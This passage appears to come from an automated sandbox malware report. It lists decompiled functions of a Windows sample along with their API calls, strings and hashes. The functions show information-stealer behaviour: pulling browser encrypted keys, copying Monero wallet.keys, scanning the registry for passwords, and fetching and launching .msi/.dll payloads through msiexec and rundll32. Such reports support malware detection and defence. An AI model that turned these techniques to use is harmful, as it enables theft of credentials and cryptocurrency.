                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                            • Instruction ID: ac345bdbf4afad4efea6b61427706070990cdd9e31017373fb5333ca9d24c139
                            • Opcode Fuzzy Hash: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                            • Instruction Fuzzy Hash: 0C12FF718145189ADF1AFBA0DC92FEEB778AF14300F504259F5066A191EF342B4ADFE2
                            Function 003952C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                              • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,0115E828), ref: 00386303
                              • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                              • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00386385
                              • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                              • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                            • lstrlen.KERNEL32(00000000), ref: 0039532F
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                            • lstrlen.KERNEL32(00000000), ref: 00395383
                            • lstrlen.KERNEL32(00000000), ref: 003953AE
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 57cc4209df33fa1a2188bac05d16a27fd74fa5ff870aa97dbc83d75b7ad8c317
                            • Instruction ID: 946790896487185e6f15ae44a1d226a8db9bcb1b36d22a1a24f202893c3e645a
                            • Opcode Fuzzy Hash: 57cc4209df33fa1a2188bac05d16a27fd74fa5ff870aa97dbc83d75b7ad8c317
                            • Instruction Fuzzy Hash: BA510D309246489BDF16FFA0CD96AED7B79EF11300F504118F40A6E592EF346B46DBA2
                            Function 003912D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 48e6223d8d50adad844d654d29662f8da319f12b93baaa18060ed6240b01945c
                            • Instruction ID: b316746347b0bb88d032974e7f72cb4a15a3938602319e31ddb37e3f05f3254a
                            • Opcode Fuzzy Hash: 48e6223d8d50adad844d654d29662f8da319f12b93baaa18060ed6240b01945c
                            • Instruction Fuzzy Hash: DAC196B690021D9BCF15EF60DC89FEA7778BF64304F004599F50AAB241DB70AA85DF91
                            Function 00394280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003942EC
                            • lstrcat.KERNEL32(?,0115E538), ref: 0039430B
                            • lstrcat.KERNEL32(?,?), ref: 0039431F
                            • lstrcat.KERNEL32(?,0115CE68), ref: 00394333
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                              • Part of subcall function 00389CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 003993C0: GlobalAlloc.KERNEL32(00000000,003943DD,003943DD), ref: 003993D3
                            • StrStrA.SHLWAPI(?,0115E568), ref: 003943F3
                            • GlobalFree.KERNEL32(?), ref: 00394512
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                              • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                              • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 003944A3
                            • StrCmpCA.SHLWAPI(?,003A08D1), ref: 003944C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003944D2
                            • lstrcat.KERNEL32(00000000,?), ref: 003944E5
                            • lstrcat.KERNEL32(00000000,003A0FB8), ref: 003944F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: e7badd5eeec81888088292cec87cd7e2c9e16939db36537792e6be9be0950826
                            • Instruction ID: caa7deb26f024e3ef9a8bfa4c936c86241f4adb1f111ae8f8dbaa8508ed12435
                            • Opcode Fuzzy Hash: e7badd5eeec81888088292cec87cd7e2c9e16939db36537792e6be9be0950826
                            • Instruction Fuzzy Hash: 3B7155B6900608ABCF15FBE0DC89FEE777DAB98304F044598F605A7181EA35DB49CB91
                            Function 00381310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                              • Part of subcall function 003812A0: RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                              • Part of subcall function 003812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                              • Part of subcall function 003812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                              • Part of subcall function 003812A0: RegCloseKey.ADVAPI32(?), ref: 003812FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0038134F
                            • lstrlen.KERNEL32(?), ref: 0038135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00381377
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00381465
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 003814EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: a28a98fab51c120d0bb6d6474c73f802720236e185eae1e862b72be1392b1f58
                            • Instruction ID: 858bd698dbee9c31bb1f8e053602318171c75d662e6f0fffd4e0cf4a5ef24c80
                            • Opcode Fuzzy Hash: a28a98fab51c120d0bb6d6474c73f802720236e185eae1e862b72be1392b1f58
                            • Instruction Fuzzy Hash: 175132B19506195BCF16FB60DC92FED777CAF54300F4042D8B60AA6081EF706B89CBA6
                            Function 003875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                              • Part of subcall function 003872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                              • Part of subcall function 003872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                              • Part of subcall function 003872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                              • Part of subcall function 003872D0: HeapFree.KERNEL32(00000000), ref: 00387459
                            • lstrcat.KERNEL32(00000000,003A17FC), ref: 00387606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00387648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0038765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0038768F
                            • lstrcat.KERNEL32(00000000,003A1804), ref: 003876A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003876D3
                            • lstrcat.KERNEL32(00000000,003A1808), ref: 003876ED
                            • task.LIBCPMTD ref: 003876FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                            • Instruction ID: d3221e06edda73b4964fd788a0862bea70589f4d1d9d41fe5f51bad368f52e9f
                            • Opcode Fuzzy Hash: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                            • Instruction Fuzzy Hash: 7F312972D00609DFCB06FBA4DC99DEE7B79AB54305B244158F102AB290DB34A94ADB61
                            Function 00398100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0115E2F8,00000000,?,003A0E2C,00000000,?,00000000), ref: 00398130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00398137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00398158
                            • __aulldiv.LIBCMT ref: 00398172
                            • __aulldiv.LIBCMT ref: 00398180
                            • wsprintfA.USER32 ref: 003981AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                            • Instruction ID: 8d4a74a3f157d875425abb4447cfe267e8b7958d743c0927800fe4e7f0ed4069
                            • Opcode Fuzzy Hash: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                            • Instruction Fuzzy Hash: AF211AB1E44218ABDF00DFD4DD4AFAEBBB8FB45B14F104609F605BB280D77869058BA5
                            Function 003860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • InternetOpenA.WININET(003A0DF7,00000001,00000000,00000000,00000000), ref: 0038610F
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 00386147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0038618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003861B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 003861DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00386249
                            • InternetCloseHandle.WININET(?), ref: 00386253
                            • InternetCloseHandle.WININET(00000000), ref: 00386260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                            • Instruction ID: 801508d4c17982154f4783e8c7ae85dd935bcfa1ea37aada6fe931c589e4242f
                            • Opcode Fuzzy Hash: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                            • Instruction Fuzzy Hash: B35190B1900718AFDF21EF60CC4ABEE77B8FB44305F0085D8A605AB181DB746A89DF95
                            Function 003872D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                            • HeapFree.KERNEL32(00000000), ref: 00387459
                            • task.LIBCPMTD ref: 00387555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
